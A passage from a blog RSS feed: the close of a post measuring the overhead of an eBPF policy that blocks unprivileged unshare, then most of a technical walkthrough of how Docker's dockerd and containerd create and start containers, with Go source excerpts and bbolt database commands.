[1] 92014&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Run the policy in a new terminal window, and then run our next syscall:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-sh&quot;&gt;# unshare -frU --kill-child -- bash -c &amp;quot;exit 0&amp;quot; &amp;amp;
[2] 92019&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Now we have our two calls for comparison:&lt;/p&gt;&lt;pre&gt;&lt;code class=&quot;language-sh&quot;&gt;# cat trace
# tracer: nop
#
# entries-in-buffer/entries-written: 4/4   #P:8
#
#                                _-----=&amp;gt; irqs-off
#                               / _----=&amp;gt; need-resched
#                              | / _---=&amp;gt; hardirq/softirq
#                              || / _--=&amp;gt; preempt-depth
#                              ||| / _-=&amp;gt; migrate-disable
#                              |||| /     delay
#           TASK-PID     CPU#  |||||  TIMESTAMP  FUNCTION
#              | |         |   |||||     |         |
         unshare-92014   [002] ..... 762950852559027: sys_unshare(unshare_flags: 10000000)
         unshare-92014   [002] ..... 762950852622321: sys_unshare -&amp;gt; 0x0
         unshare-92019   [007] ..... 762975980681895: sys_unshare(unshare_flags: 10000000)
         unshare-92019   [007] ..... 762975980752033: sys_unshare -&amp;gt; 0x0&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;Subtracting each enter timestamp from its exit timestamp, unshare-92014 (no policy) used 63,294 cycles and unshare-92019 (policy loaded) used 70,138 cycles.&lt;/p&gt;&lt;p&gt;That is a penalty of 6,844 cycles (~11%) between the two measurements. Not bad!&lt;/p&gt;&lt;p&gt;These numbers are for a single syscall, and the cost adds up the more frequently the code is called. Unshare is typically called at task creation, not repeatedly during normal execution of a program. Careful consideration and measurement are needed for your use case.&lt;/p&gt;&lt;div&gt;
      &lt;h2&gt;Outro&lt;/h2&gt;
      
        
      
    &lt;/div&gt;&lt;p&gt;We learned a bit about what LSM BPF is, how unshare is used to map a user to root, and how to solve a real-world problem by implementing a solution in eBPF. Tracking down the appropriate hook is not an easy task; it requires some experimentation and reading a lot of kernel code. Fortunately, that’s the hard part. Because a policy is written in C, we can fine-tune the policy to our problem. For example, one may extend this policy with an allow-list so that certain programs or users can continue to use an unprivileged unshare. Finally, we looked at the performance impact of this program and saw that the overhead is a worthwhile price for blocking the attack vector.&lt;/p&gt;&lt;p&gt;“Cannot allocate memory” is not a clear error message for denying permissions. We proposed a &lt;a href=&quot;https://lore.kernel.org/all/20220608150942.776446-1-fred@cloudflare.com/&quot;&gt;patch&lt;/a&gt; to propagate error codes from the &lt;i&gt;cred_prepare&lt;/i&gt; hook up the call stack. Ultimately, we concluded that a new hook is better suited to this problem. Stay tuned!&lt;/p&gt;</content:encoded>
</item>
<item>
<title>Docker Internal (3) | Blog</title>
<link>https://u1f383.github.io/linux/2026/06/04/Docker-Internal-3.html</link>
<guid isPermaLink="false">ItZsH2k9-sV8SYiZFIBI0E24MsD66ylbXpov6g==</guid>
<pubDate>Fri, 19 Jun 2026 10:24:09 +0000</pubDate>
<description>In the third post, we’ll discuss how the container is loaded.</description>
<content:encoded>&lt;p&gt;In the third post, we’ll discuss how the container is loaded.&lt;/p&gt;&lt;p&gt;Since the vulnerability I found has not yet been patched 😢, I won’t discuss how the NVIDIA toolkit can work as a replacement runtime in this post. I’ll cover it in a future post once the bug has been fixed.&lt;/p&gt;&lt;p&gt;&lt;img src=&quot;https://u1f383.github.io/assets/image-20260604000000000.png&quot; alt=&quot;image-20260604000000000&quot; title=&quot;&quot;/&gt;&lt;/p&gt;&lt;h2&gt;1. Load a Container&lt;/h2&gt;&lt;p&gt;If you run &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;docker run --rm -it ubuntu:24.04&lt;/code&gt;, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;dockerd&lt;/code&gt; will receive two HTTP requests. The first is to create a container, which is the same as executing &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;docker create ubuntu:24.04&lt;/code&gt;.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;POST /v1.54/containers/create HTTP/1.1
Host: api.moby.localhost
User-Agent: Docker-Client/29.5.2 (linux)
Content-Length: 1711
Content-Type: application/json
...&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;The second is to start the container, which is the same as executing &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;docker start &amp;lt;container_id&amp;gt;&lt;/code&gt;.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;POST /v1.54/containers/17b7029c5b5121a40ef71d91640fff00f20152df0b167a4464c02450c208b8a1/start HTTP/1.1
Host: api.moby.localhost
User-Agent: Docker-Client/29.5.2 (linux)
Content-Length: 0&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;dockerd&lt;/code&gt;’s &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;initRoutes()&lt;/code&gt; defines both endpoint handlers, and we’ll read their implementation later.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// daemon/server/router/container/container.go
func (c *containerRouter) initRoutes() {
    c.routes = []router.Route{
        // [...]
        router.NewPostRoute(&amp;quot;/containers/create&amp;quot;, c.postContainersCreate),
        // [...]
        router.NewPostRoute(&amp;quot;/containers/{name:.*}/start&amp;quot;, c.postContainersStart),
        // [...]
    }
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;h3&gt;1.1. Create&lt;/h3&gt;&lt;p&gt;The request body is JSON that contains the container’s configuration. The actual data looks like this:&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;{
  &amp;quot;Hostname&amp;quot;: &amp;quot;&amp;quot;,
  &amp;quot;Domainname&amp;quot;: &amp;quot;&amp;quot;,
  &amp;quot;User&amp;quot;: &amp;quot;&amp;quot;,
  &amp;quot;AttachStdin&amp;quot;: false,
  &amp;quot;AttachStdout&amp;quot;: true,
  &amp;quot;AttachStderr&amp;quot;: true,
  &amp;quot;Tty&amp;quot;: false,
  &amp;quot;OpenStdin&amp;quot;: false,
  &amp;quot;StdinOnce&amp;quot;: false,
  &amp;quot;Env&amp;quot;: null,
  &amp;quot;Cmd&amp;quot;: null,
  &amp;quot;Image&amp;quot;: &amp;quot;ubuntu:24.04&amp;quot;,
  &amp;quot;Volumes&amp;quot;: {},
  &amp;quot;WorkingDir&amp;quot;: &amp;quot;&amp;quot;,
  &amp;quot;Entrypoint&amp;quot;: null,
  &amp;quot;Labels&amp;quot;: {},
  &amp;quot;HostConfig&amp;quot;: {
    &amp;quot;Binds&amp;quot;: null,
    &amp;quot;ContainerIDFile&amp;quot;: &amp;quot;&amp;quot;,
    &amp;quot;LogConfig&amp;quot;: {
      &amp;quot;Type&amp;quot;: &amp;quot;&amp;quot;,
      &amp;quot;Config&amp;quot;: {}
    },
    &amp;quot;NetworkMode&amp;quot;: &amp;quot;default&amp;quot;,
    &amp;quot;PortBindings&amp;quot;: {},
    &amp;quot;RestartPolicy&amp;quot;: {
      &amp;quot;Name&amp;quot;: &amp;quot;no&amp;quot;,
      &amp;quot;MaximumRetryCount&amp;quot;: 0
    },
    &amp;quot;AutoRemove&amp;quot;: false,
    &amp;quot;VolumeDriver&amp;quot;: &amp;quot;&amp;quot;,
    &amp;quot;VolumesFrom&amp;quot;: null,
    &amp;quot;ConsoleSize&amp;quot;: [
      50,
      212
    ],
    &amp;quot;CapAdd&amp;quot;: null,
    &amp;quot;CapDrop&amp;quot;: null,
    &amp;quot;CgroupnsMode&amp;quot;: &amp;quot;&amp;quot;,
    &amp;quot;Dns&amp;quot;: null,
    &amp;quot;DnsOptions&amp;quot;: [],
    &amp;quot;DnsSearch&amp;quot;: [],
    &amp;quot;ExtraHosts&amp;quot;: null,
    &amp;quot;GroupAdd&amp;quot;: null,
    &amp;quot;IpcMode&amp;quot;: &amp;quot;&amp;quot;,
    &amp;quot;Cgroup&amp;quot;: &amp;quot;&amp;quot;,
    &amp;quot;Links&amp;quot;: null,
    &amp;quot;OomScoreAdj&amp;quot;: 0,
    &amp;quot;PidMode&amp;quot;: &amp;quot;&amp;quot;,
    &amp;quot;Privileged&amp;quot;: false,
    &amp;quot;PublishAllPorts&amp;quot;: false,
    &amp;quot;ReadonlyRootfs&amp;quot;: false,
    &amp;quot;SecurityOpt&amp;quot;: null,
    &amp;quot;UTSMode&amp;quot;: &amp;quot;&amp;quot;,
    &amp;quot;UsernsMode&amp;quot;: &amp;quot;&amp;quot;,
    &amp;quot;ShmSize&amp;quot;: 0,
    &amp;quot;Isolation&amp;quot;: &amp;quot;&amp;quot;,
    &amp;quot;CpuShares&amp;quot;: 0,
    &amp;quot;Memory&amp;quot;: 0,
    &amp;quot;NanoCpus&amp;quot;: 0,
    &amp;quot;CgroupParent&amp;quot;: &amp;quot;&amp;quot;,
    &amp;quot;BlkioWeight&amp;quot;: 0,
    &amp;quot;BlkioWeightDevice&amp;quot;: [],
    &amp;quot;BlkioDeviceReadBps&amp;quot;: [],
    &amp;quot;BlkioDeviceWriteBps&amp;quot;: [],
    &amp;quot;BlkioDeviceReadIOps&amp;quot;: [],
    &amp;quot;BlkioDeviceWriteIOps&amp;quot;: [],
    &amp;quot;CpuPeriod&amp;quot;: 0,
    &amp;quot;CpuQuota&amp;quot;: 0,
    &amp;quot;CpuRealtimePeriod&amp;quot;: 0,
    &amp;quot;CpuRealtimeRuntime&amp;quot;: 0,
    &amp;quot;CpusetCpus&amp;quot;: &amp;quot;&amp;quot;,
    &amp;quot;CpusetMems&amp;quot;: &amp;quot;&amp;quot;,
    &amp;quot;Devices&amp;quot;: [],
    &amp;quot;DeviceCgroupRules&amp;quot;: null,
    &amp;quot;DeviceRequests&amp;quot;: null,
    &amp;quot;MemoryReservation&amp;quot;: 0,
    &amp;quot;MemorySwap&amp;quot;: 0,
    &amp;quot;MemorySwappiness&amp;quot;: -1,
    &amp;quot;OomKillDisable&amp;quot;: false,
    &amp;quot;PidsLimit&amp;quot;: 0,
    &amp;quot;Ulimits&amp;quot;: [],
    &amp;quot;CpuCount&amp;quot;: 0,
    &amp;quot;CpuPercent&amp;quot;: 0,
    &amp;quot;IOMaximumIOps&amp;quot;: 0,
    &amp;quot;IOMaximumBandwidth&amp;quot;: 0,
    &amp;quot;MaskedPaths&amp;quot;: null,
    &amp;quot;ReadonlyPaths&amp;quot;: null
  },
  &amp;quot;NetworkingConfig&amp;quot;: {
    &amp;quot;EndpointsConfig&amp;quot;: {
      &amp;quot;default&amp;quot;: {
        &amp;quot;IPAMConfig&amp;quot;: null,
        &amp;quot;Links&amp;quot;: null,
        &amp;quot;Aliases&amp;quot;: null,
        &amp;quot;DriverOpts&amp;quot;: null,
        &amp;quot;GwPriority&amp;quot;: 0,
        &amp;quot;NetworkID&amp;quot;: &amp;quot;&amp;quot;,
        &amp;quot;EndpointID&amp;quot;: &amp;quot;&amp;quot;,
        &amp;quot;Gateway&amp;quot;: &amp;quot;&amp;quot;,
        &amp;quot;IPAddress&amp;quot;: &amp;quot;&amp;quot;,
        &amp;quot;MacAddress&amp;quot;: &amp;quot;&amp;quot;,
        &amp;quot;IPPrefixLen&amp;quot;: 0,
        &amp;quot;IPv6Gateway&amp;quot;: &amp;quot;&amp;quot;,
        &amp;quot;GlobalIPv6Address&amp;quot;: &amp;quot;&amp;quot;,
        &amp;quot;GlobalIPv6PrefixLen&amp;quot;: 0,
        &amp;quot;DNSNames&amp;quot;: null
      }
    }
  }
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;postContainersCreate()&lt;/code&gt; first decodes the request into three different configs [1] and then creates a container based on these configs [2].&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// daemon/server/router/container/container_routes.go
func (c *containerRouter) postContainersCreate(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
    // [...]
    req, err := runconfig.DecodeCreateRequest(rdr, c.backend.RawSysInfo())
    config, hostConfig, networkingConfig := req.Config, req.HostConfig, req.NetworkingConfig // [1]
    // [...]
    ccr, err := c.backend.ContainerCreate(ctx, backend.ContainerCreateConfig{ // [2]
        Name:                        name,
        Config:                      config,
        HostConfig:                  hostConfig,
        NetworkingConfig:            networkingConfig,
        Platform:                    platform,
        DefaultReadOnlyNonRecursive: defaultReadOnlyNonRecursive,
    })
    // [...]
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;Internally, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;newContainer()&lt;/code&gt; is called to create a container instance and set its root directory to &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;/var/lib/docker/containers/&amp;lt;id&amp;gt;&lt;/code&gt; [3].&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// daemon/container.go
func (daemon *Daemon) newContainer(name string, platform ocispec.Platform, config *containertypes.Config, hostConfig *containertypes.HostConfig, imgID image.ID, managed bool) (*container.Container, error) {
    // [...]
    base := container.NewBaseContainer(id, filepath.Join(daemon.repository, id)) // [3]
    // [...]
    base.Config = config
    base.HostConfig = hostConfig
    // [...]
    return base, nil
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;After the container has been set up, its metadata is saved into &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;config.v2.json&lt;/code&gt; for later use [4]. The host configuration is also saved, but it is kept separately in another file, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;hostconfig.json&lt;/code&gt; [5].&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// daemon/container/container.go
func (container *Container) CheckpointTo(ctx context.Context, store *ViewDB) error {
    // [...]
    deepCopy, err := container.toDisk()
    // [...]
}

func (container *Container) toDisk() (*Container, error) {
    // [...]
    pth, err := container.ConfigPath() // config.v2.json
    f, err := atomicwriter.New(pth, 0o600)
    w := io.MultiWriter(&amp;amp;buf, f)
    if err := json.NewEncoder(w).Encode(container); err != nil { // [4]
        // [...]
    }

    var deepCopy Container
    if err := json.NewDecoder(&amp;amp;buf).Decode(&amp;amp;deepCopy); err != nil {
        // [...]
    }
    deepCopy.HostConfig, err = container.WriteHostConfig() // &amp;lt;--------
    // [...]
}

func (container *Container) WriteHostConfig() (*containertypes.HostConfig, error) {
    // [...]
    pth, err := container.HostConfigPath() // hostconfig.json
    f, err := atomicwriter.New(pth, 0o600)
    w := io.MultiWriter(&amp;amp;buf, f)
    if err := json.NewEncoder(w).Encode(&amp;amp;container.HostConfig); err != nil { // [5]
        // [...]
    }
    // [...]
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;We can see these files in the corresponding directory.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;root@aaa:~# ls -al /var/lib/docker/containers/2fa14c3b70546123aa4de5628bad07282085500fb48dee65adae4546b55b7128/
total 20
drwx--x--- 3 root root 4096 Jun  3 11:15 .
drwx--x--- 4 root root 4096 Jun  3 11:36 ..
drwx------ 2 root root 4096 Jun  3 11:15 checkpoints
-rw------- 1 root root 2462 Jun  3 11:15 config.v2.json
-rw------- 1 root root 1216 Jun  3 11:15 hostconfig.json&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;These configs are loaded and used from &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;dockerd&lt;/code&gt;’s memory store [6], which is a mapping from a container’s ID to its container object.&lt;/p&gt;&lt;p&gt;Every time &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;dockerd&lt;/code&gt; restarts, the initialization function &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;NewDaemon()&lt;/code&gt; calls &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;loadContainers()&lt;/code&gt; [7] to cache all of them in the memory store, which avoids heavy disk access.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// daemon/daemon.go
func NewDaemon(ctx context.Context, config *config.Config, pluginStore *plugin.Store, authzMiddleware *authorization.Middleware) (_ *Daemon, retErr error) {
    // [...]
    containers, err := d.loadContainers(ctx) // [7]
    // [...]
}

func (daemon *Daemon) loadContainers(ctx context.Context) (map[string]map[string]*container.Container, error) {
    // [...]
    dir, err := os.ReadDir(daemon.repository)
    // [...]
    for _, v := range dir {
        // [...]
        id := v.Name()
        c, err := daemon.load(id)
        containers[c.ID] = c // &amp;lt;--------
        // [...]
    }
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;h3&gt;1.2. Start&lt;/h3&gt;&lt;p&gt;After the container is created, the container-starting request is sent to &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;dockerd&lt;/code&gt; to run the container.&lt;/p&gt;&lt;p&gt;Inside &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;ContainerStart()&lt;/code&gt;, the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;daemonCfg&lt;/code&gt; is created to hold the current daemon (&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;dockerd&lt;/code&gt;) configuration [1]. &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;daemon.GetContainer()&lt;/code&gt; is then called to retrieve the matching container object from the memory store [2]. Finally, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;containerStart()&lt;/code&gt; is called to start the container with these configurations [3].&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// daemon/server/router/container/container_routes.go
func (c *containerRouter) postContainersStart(ctx context.Context, w http.ResponseWriter, r *http.Request, vars map[string]string) error {
    // [...]
    if err := c.backend.ContainerStart(ctx, vars[&amp;quot;name&amp;quot;], r.Form.Get(&amp;quot;checkpoint&amp;quot;), r.Form.Get(&amp;quot;checkpoint-dir&amp;quot;)); err != nil { // &amp;lt;--------
        return err
    }
    // [...]
}

// daemon/start.go
func (daemon *Daemon) ContainerStart(ctx context.Context, name string, checkpoint string, checkpointDir string) error {
    daemonCfg := daemon.config() // [1]
    // [...]
    ctr, err := daemon.GetContainer(name) // [2]
    // [...]
    return daemon.containerStart(ctx, daemonCfg, ctr, checkpoint, checkpointDir, true) // [3]
}

// daemon/daemon.go
type configStore struct {
    config.Config

    Runtimes runtimes
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;containerStart()&lt;/code&gt; does four things. First, it &lt;strong&gt;generates the container’s OCI spec&lt;/strong&gt; [4], which determines the container’s runtime environment. Then it &lt;strong&gt;creates a container on the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;containerd&lt;/code&gt; side&lt;/strong&gt; [5].&lt;/p&gt;&lt;p&gt;You may wonder why we need to create another container when one already exists. The two creations happen at different layers. The first is triggered by &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;docker create ...&lt;/code&gt;, and it stores the metadata and config objects on the filesystem; it is &lt;strong&gt;for &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;dockerd&lt;/code&gt;&lt;/strong&gt;.&lt;/p&gt;&lt;p&gt;This time, the creation is for the &lt;strong&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;containerd&lt;/code&gt;-level&lt;/strong&gt; container object. &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;containerd&lt;/code&gt; inserts a record about the OCI spec and shim/runtime into the database.&lt;/p&gt;&lt;p&gt;After that, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;dockerd&lt;/code&gt; asks &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;containerd&lt;/code&gt; to &lt;strong&gt;create a task&lt;/strong&gt; [6]. A task is the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;containerd&lt;/code&gt;-level handle for the running container; creating it starts the shim daemon, which in turn creates the init process.
At this point, the task has been created but is stopped, waiting to be unblocked before it executes the entrypoint binary.&lt;/p&gt;&lt;p&gt;Finally, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;dockerd&lt;/code&gt; calls &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;tsk.Start()&lt;/code&gt; [7] to &lt;strong&gt;start the task&lt;/strong&gt;, indirectly telling the shim daemon to unblock the init process, which then executes the entrypoint binary and becomes the container.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// daemon/start.go
func (daemon *Daemon) containerStart(ctx context.Context, daemonCfg *configStore, container *container.Container, checkpoint string, checkpointDir string, resetRestartManager bool) (retErr error) {
    // ... container setting
    // 1. build OCI spec
    spec, err := daemon.createSpec(ctx, daemonCfg, container, mnts) // [4]
    
    // [...]
    // 2. create a container (containerd.services.containers.v1.Containers/Create)
    ctr, err := libcontainerd.ReplaceContainer(ctx, daemon.containerd, container.ID, spec, shim, createOptions, func(ctx context.Context, client *containerd.Client, c *containers.Container) error { // [5]
        // [...]
        is, ok := daemon.imageService.(*mobyc8dstore.ImageService)
        img, err := is.ResolveImage(ctx, container.Config.Image)
        // [...]
        c.Image = img.Name
        return nil
    })

    // [...]
    // 3. create a task (containerd.services.tasks.v1.Tasks/Create)
    tsk, err := ctr.NewTask(/* ... */) // [6]

    // [...]
    // 4. start the task (containerd.services.tasks.v1.Tasks/Start)
    if err := tsk.Start(context.WithoutCancel(ctx)); err != nil { // [7]
        // [...]
    }
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;h4&gt;1.2.1. Create the OCI spec&lt;/h4&gt;&lt;p&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;createSpec()&lt;/code&gt; generates the OCI spec. It first gets the default spec [1] and registers config-parsing callbacks [2]. Later, the callbacks are invoked to modify the OCI spec [3].&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// daemon/oci_linux.go
func (daemon *Daemon) createSpec(ctx context.Context, daemonCfg *configStore, c *container.Container, mounts []container.Mount) (retSpec *specs.Spec, _ error) {
    var (
        opts []coci.SpecOpts
        s    = oci.DefaultSpec() // [1]
    )
    opts = append(opts,
        withCommonOptions(daemon, &amp;amp;daemonCfg.Config, c), // [2]
        // [...]
    )
    // apply the registered option callbacks to the spec
    return &amp;amp;s, coci.ApplyOpts(ctx, daemon.containerdClient, &amp;amp;containers.Container{ // &amp;lt;--------
        ID:          c.ID,
        Snapshotter: snapshotter,
        SnapshotKey: snapshotKey,
    }, &amp;amp;s, opts...)
}

func ApplyOpts(ctx context.Context, client Client, c *containers.Container, s *Spec, opts ...SpecOpts) error {
    for _, o := range opts {
        if err := o(ctx, client, c, s); err != nil { // [3]
            return err
        }
    }

    return nil
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;If you don’t pass additional options, most fields in the default spec [4] carry over unchanged into the final generated JSON config.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// daemon/pkg/oci/defaults.go
func DefaultSpec() specs.Spec {
    // [...]
    return DefaultLinuxSpec()
}

func DefaultLinuxSpec() specs.Spec {
    return specs.Spec{ // [4]
        // [...]
        Process: &amp;amp;specs.Process{
            Capabilities: &amp;amp;specs.LinuxCapabilities{
                Bounding:  caps.DefaultCapabilities(),
                Permitted: caps.DefaultCapabilities(),
                Effective: caps.DefaultCapabilities(),
            },
        },
        // [...]
    }
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;h4&gt;1.2.2. Save Container Metadata into DB&lt;/h4&gt;&lt;p&gt;The &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;.ReplaceContainer()&lt;/code&gt; call is internally wrapped into a &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;&amp;quot;/containerd.services.containers.v1.Containers/Create&amp;quot;&lt;/code&gt; request and sent to &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;containerd&lt;/code&gt; [1].&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// daemon/internal/libcontainerd/replace.go
func ReplaceContainer(ctx context.Context, client types.Client, id string, spec *specs.Spec, shim string, runtimeOptions any, opts ...containerd.NewContainerOpts) (types.Container, error) {
    newContainer := func() (types.Container, error) {
        return client.NewContainer(ctx, id, spec, shim, runtimeOptions, opts...)
    }
    ctr, err := newContainer() // &amp;lt;--------
    // [...]
}

// vendor/github.com/containerd/containerd/api/services/containers/v1/containers_grpc.pb.go
func (c *containersClient) Create(ctx context.Context, in *CreateContainerRequest, opts ...grpc.CallOption) (*CreateContainerResponse, error) {
    out := new(CreateContainerResponse)
    err := c.cc.Invoke(ctx, &amp;quot;/containerd.services.containers.v1.Containers/Create&amp;quot;, in, out, opts...) // [1]
    // [...]
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;On the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;containerd&lt;/code&gt; side, &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;_Containers_Create_Handler()&lt;/code&gt; is called to save the container object into the boltdb (&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;/var/lib/containerd/io.containerd.metadata.v1.bolt/meta.db&lt;/code&gt;) [2].&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://github.com/etcd-io/bbolt&quot;&gt;&lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;bbolt&lt;/code&gt;&lt;/a&gt; is an embedded key/value database for Go, and here it is used as a metadata store by &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;containerd&lt;/code&gt;.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;// api/services/containers/v1/containers_grpc.pb.go
func _Containers_Create_Handler(srv interface{}, ctx context.Context, dec func(interface{}) error, interceptor grpc.UnaryServerInterceptor) (interface{}, error) {
    // [...]
    info := &amp;amp;grpc.UnaryServerInfo{
        Server:     srv,
        FullMethod: &amp;quot;/containerd.services.containers.v1.Containers/Create&amp;quot;,
    }
    handler := func(ctx context.Context, req interface{}) (interface{}, error) {
        return srv.(ContainersServer).Create(ctx, req.(*CreateContainerRequest)) // &amp;lt;--------
    }
    // [...]
}

// plugins/services/containers/local.go
func (l *local) Create(ctx context.Context, req *api.CreateContainerRequest, _ ...grpc.CallOption) (*api.CreateContainerResponse, error) {
    // [...]
    if err := l.withStoreUpdate(ctx, func(ctx context.Context) error { // [2]
        container := containerFromProto(req.Container)
        // [...]
        created, err := l.Store.Create(ctx, container)
        resp.Container = containerToProto(&amp;amp;created)
        // [...]
        return nil
    })
}&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;The container object here is different from &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;dockerd&lt;/code&gt;’s. &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;containerd&lt;/code&gt;’s container object is a &lt;strong&gt;runtime metadata record&lt;/strong&gt; (ID, Runtime, Snapshotter, Image, Spec, Labels, …). They are persisted independently in different stores.&lt;/p&gt;&lt;p&gt;If you are interested in how the DB entry looks, you can first install the &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;bbolt&lt;/code&gt; CLI:&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;go install go.etcd.io/bbolt/cmd/bbolt@latest&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;/div&gt;&lt;p&gt;It allows you to view the entry content from &lt;code class=&quot;language-plaintext highlighter-rouge&quot;&gt;meta.db&lt;/code&gt;.&lt;/p&gt;&lt;div&gt;&lt;div&gt;&lt;pre&gt;&lt;code&gt;# [Check database file integrity]
bbolt check meta.db
## Response: OK

# [List the bucket]
bbolt buckets meta.db
## Response: v1

# [List and get keys]
bbolt keys meta.db v1
## Response:
##  moby
##  moby_history
##  version
##
## PS. moby and moby_history are sub-buckets

bbolt keys meta.db v1 moby containers
## Response:
##  db58127f96bd2c5655eb53f516ba7efeafac3c7335c5f2389e2b8a329e034b11

bbolt get meta.db v1 moby containers db58127f96bd2c5655eb53f516ba7efeafac3c7335c5f2389e2b8a329e034b11 spec
## Response:
##  0a3674797065732e636f6e7461...(lots hex value)
